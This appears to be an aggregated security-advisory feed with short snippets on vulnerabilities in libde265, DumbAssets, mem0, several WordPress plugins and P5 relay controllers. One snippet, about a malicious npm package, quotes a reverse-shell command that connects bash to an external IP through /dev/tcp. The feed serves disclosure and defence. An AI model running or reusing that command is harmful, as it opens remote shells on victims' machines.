Astra Linux - уязвимость в libde265

It was discovered that Libde265 v1.0.11 contains a segmentation violation through the function decodercontext::processSliceSegmentHeader in decctx.cc...

CVE-2026-45231

DumbAssets through 1.0.11 contains a stored cross-site scripting vulnerability in asset fields including name, description, modelNumber, serialNumber, and tags that are stored without server-side sanitization and rendered using innerHTML without client-side escaping. Attackers can create or updat...

CVE-2026-45230 DumbAssets 1.0.11 Path Traversal File Deletion via /api/delete-file

DumbAssets through 1.0.11 contains a path traversal vulnerability in the POST /api/delete-file endpoint and filesToDelete array parameters that allows unauthenticated attackers to delete arbitrary files by supplying ../ sequences that bypass directory boundary validation. Attackers can exploit th...

Malicious code in hello-world-pkg-value-value-p (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector d768990007f2926e3a58020102d277c3a604c6aa3bc70056cd466bc24437fc89 This package's postinstall hook executes node index.js, which runs execSync'bash -i & /dev/tcp/52.249.218.132/8080 0&1' — an interactive bash reverse...

CVE-2026-7597

A vulnerability was found in mem0ai mem0 up to 1.0.11. This affects the function pickle.load/pickle.dump of the file mem0/vectorstores/faiss.py. Performing a manipulation results in deserialization. It is possible to initiate the attack remotely. The exploit has been made public and could be used...

CVE-2026-7597

A vulnerability was found in mem0ai mem0 up to 1.0.11. This affects the function pickle.load/pickle.dump of the file mem0/vectorstores/faiss.py. Performing a manipulation results in deserialization. It is possible to initiate the attack remotely. The exploit has been made public and could be used...

mem0 输入验证错误漏洞

mem0 is an efficient memory algorithm benchmarking tool open-sourced by Mem0. An input validation error vulnerability exists in mem0 1.0.11 and earlier versions, which stems from improper manipulation of the pickle.load/pickle.dump functions in the mem0/vectorstores/faiss.py file, which could lea...

[SECURITY] [DLA 4550-1] libde265 security update

Debian LTS Advisory DLA-4550-1 [email protected] https://www.debian.org/lts/security/ Andreas Henriksson April 27, 2026 https://wiki.debian.org/LTS Package : libde265 Version : 1.0.11-0+deb11u4 CVE ID : CVE-2023-51792 CVE-2026-33164 CVE-2026-33165 Debian Bug : 1131468 1131469 It was fou...

WordPress Ultra Addons for WPForms plugin <= 1.0.11 - Broken Access Control vulnerability

Broken Access Control vulnerability discovered by CidKagenouSama in WordPress Plugin Ultra Addons for WPForms versions = 1.0.11...

📄 WordPress AI Feeds 1.0.11 Shell Upload

Proof of concept exploit for an unauthenticated arbitrary file upload vulnerability in the AI Feeds plugin for WordPress versions 1.0.11 and earlier. The vulnerability allows unauthenticated attackers to upload arbitrary files, including PHP webshells, by exploiting the GitHub integration...

CVE-2026-25333

Missing Authorization vulnerability in peregrinethemes Shopwell shopwell allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Shopwell: from n/a through = 1.0.11...

CVE-2026-25333

CVE-2026-25333 affects the WordPress Shopwell theme (versions

WordPress plugin Shopwell 安全漏洞

WordPress and WordPress plugins are both products of the WordPress Foundation. WordPress is a blog platform developed using the PHP language. This platform allows for the creation of personal blog websites on servers based on PHP and MySQL. A WordPress plugin is an application extension. The...

CVE-2020-37148

P5 FNIP-8x16A/FNIP-4xSH versions 1.0.20 and 1.0.11 suffer from a stored cross-site scripting vulnerability. Input passed to several GET/POST parameters is not properly sanitized before being returned to the user, allowing attackers to execute arbitrary HTML and script code in a user's browser...

CVE-2020-37148

P5 FNIP-8x16A/FNIP-4xSH versions 1.0.20 and 1.0.11 suffer from a stored cross-site scripting vulnerability. Input passed to several GET/POST parameters is not properly sanitized before being returned to the user, allowing attackers to execute arbitrary HTML and script code in a user's browser...

P5 FNIP-8x16A和P5 FNIP-4xSH 跨站脚本漏洞

The P5 FNIP-8x16A and P5 FNIP-4xSH are Ethernet relay controllers produced by the British company P5. Both versions of P5 FNIP-8x16A and P5 FNIP-4xSH, as well as the 1.0.11 version, have a cross-site scripting vulnerability. This vulnerability arises from improper cleaning of multiple GET/POST...

CVE-2025-69073 WordPress Piqes theme <= 1.0.11 - Local File Inclusion vulnerability

Improper Control of Filename for Include/Require Statement in PHP Program 'PHP Remote File Inclusion' vulnerability in AncoraThemes Piqes piqes allows PHP Local File Inclusion.This issue affects Piqes: from n/a through = 1.0.11...

WordPress plugin Piqes has a security vulnerability

WordPress and WordPress plugins are both products of the WordPress Foundation. WordPress is a blog platform developed using the PHP language. This platform allows for the creation of personal blog websites on servers based on PHP and MySQL. A WordPress plugin is an application extension. WordPres...

PT-2026-4159

Improper Control of Filename for Include/Require Statement in PHP Program 'PHP Remote File Inclusion' vulnerability in AncoraThemes Piqes piqes allows PHP Local File Inclusion.This issue affects Piqes: from n/a through = 1.0.11...

CVE-2025-23933

Improper Neutralization of Input During Web Page Generation 'Cross-site Scripting' vulnerability in wpfreeware WpF Ultimate Carousel wpf-ultimate-carousel allows Stored XSS.This issue affects WpF Ultimate Carousel: from n/a through = 1.0.11...